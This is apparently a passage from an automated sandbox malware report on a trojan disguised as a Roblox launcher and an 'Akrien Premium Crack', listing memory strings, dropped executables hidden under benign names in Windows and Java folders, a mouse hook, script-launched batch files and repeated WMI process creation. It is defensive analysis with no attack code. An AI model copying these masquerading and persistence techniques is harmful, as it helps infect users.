00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/(
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.2005374246.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/3
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/d
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/d$6
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/v1.0/SequenceStatistics/BatchAddToSequencesV2?apiKey=76E5A4
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/v1.1/Counters/BatchIncrement?apiKey=76E5A40C-3AE1-4028-9F10
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988611713.00000000042BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/x_age
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005526699.00000000040D7000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042A6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/ersion-d6abc3b106a04c5c-rbxInstallerPkgManifest.txt
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/ve/version-d6abc3b106a04c5c-rbxPkgManifest.txt
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042A6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.000000000424B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-RobloxPlayerLauncher.exe
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.000000000424B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-RobloxPlayerLauncher.exe_
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txt
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txt6
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txthb
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtL
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtW
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtZ
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxPkgManifest.txt
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxPkgManifest.txtP
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxPkgManifest.txtx
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://uploads.backtrace.rbx.com/post
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploads.backtrace.rbx.com/post--annotation=RobloxChannel=production--annotation=RobloxGitHas
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploads.backtrace.rbx.com/post2
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://uploads.backtrace.rbx.com/postCrashUploadToBacktraceBaseUrla2440b0bfdada85f34d79b43839f2b49e
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploads.backtrace.rbx.com/postD#
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploads.backtrace.rbx.com/postT
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4191571770.0000000140129000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: DirectInput8Creatememstr_ecd51bfe-b
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dllJump to behavior

            System Summary

            barindex
            Source: C:\Users\user\Desktop\RFAwChXSve.exeFile created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeFile created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeFile created: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,5_2_00B4718C
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\24ea3b44df2b49
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\en-US\RuntimeBroker.exe
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\en-US\9e8d7a4ca61bd9
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_00A1562B1_2_00A1562B
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_008B14A03_2_008B14A0
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_007151003_2_00715100
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A021D23_2_00A021D2
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A01AFC3_2_00A01AFC
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_009F7BB03_2_009F7BB0
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A0256F3_2_00A0256F
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00711EF03_2_00711EF0
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A1562B3_2_00A1562B
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A236293_2_00A23629
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A01E443_2_00A01E44
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00749F603_2_00749F60
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_008D1F103_2_008D1F10
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4857B5_2_00B4857B
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B570BF5_2_00B570BF
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B6D00E5_2_00B6D00E
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4407E5_2_00B4407E
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B711945_2_00B71194
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4E2A05_2_00B4E2A0
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B432815_2_00B43281
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B602F65_2_00B602F6
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B566465_2_00B56646
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B427E85_2_00B427E8
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B537C15_2_00B537C1
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B6473A5_2_00B6473A
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B6070E5_2_00B6070E
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4E8A05_2_00B4E8A0
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4F9685_2_00B4F968
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B649695_2_00B64969
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B53A3C5_2_00B53A3C
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B56A7B5_2_00B56A7B
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B6CB605_2_00B6CB60
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B60B435_2_00B60B43
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B55C775_2_00B55C77
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5FDFA5_2_00B5FDFA
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4ED145_2_00B4ED14
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B53D6D5_2_00B53D6D
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4BE135_2_00B4BE13
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4DE6C5_2_00B4DE6C
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B45F3C5_2_00B45F3C
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B60F785_2_00B60F78
            Source: C:\Browserfont\refdhcp.exeCode function: 9_2_00007FFD9B9F35959_2_00007FFD9B9F3595
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeCode function: 38_2_00007FFD9BA0359538_2_00007FFD9BA03595
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeCode function: 40_2_00007FFD9B9F359540_2_00007FFD9B9F3595
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeCode function: 40_2_00007FFD9BA18B7240_2_00007FFD9BA18B72
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeCode function: 40_2_00007FFD9BA2604D40_2_00007FFD9BA2604D
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeCode function: 40_2_00007FFD9BA17DC640_2_00007FFD9BA17DC6
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: String function: 009E1C40 appears 40 times
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: String function: 0072DE70 appears 92 times
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: String function: 00B5E28C appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: String function: 00B5E360 appears 52 times
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: String function: 00B5ED00 appears 31 times
            Source: refdhcp.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRoblox.exeH vs RFAwChXSve.exe
            Source: RFAwChXSve.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vKVTrVC9rFRJDAycoWs.csCryptographic APIs: 'CreateDecryptor'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vKVTrVC9rFRJDAycoWs.csCryptographic APIs: 'CreateDecryptor'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformBlock'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, vKVTrVC9rFRJDAycoWs.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, vKVTrVC9rFRJDAycoWs.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformBlock'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, vKVTrVC9rFRJDAycoWs.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, vKVTrVC9rFRJDAycoWs.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformBlock'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@52/58@0/5
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A281C0 FormatMessageW,GetLastError,3_2_00A281C0
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00834A80 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_00834A80
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_0073A690 std::ios_base::failure::failure,Concurrency::cancel_current_task,CoCreateInstance,DeleteFileW,3_2_0073A690
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00737330 LoadResource,LockResource,SizeofResource,3_2_00737330
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PCClientBootstrapper[1].jsonJump to behavior
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeMutant created: NULL
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeMutant created: \Sessions\1\BaseNamedObjects\Local\5999dbe80fd56da6aef80eb55286c73df5d830d3
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
            Source: C:\Users\user\Desktop\RFAwChXSve.exeFile created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" "
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCommand line argument: sfxname5_2_00B5D5D4
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCommand line argument: sfxstime5_2_00B5D5D4
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCommand line argument: STARTDLG5_2_00B5D5D4
            Source: RFAwChXSve.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\RFAwChXSve.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
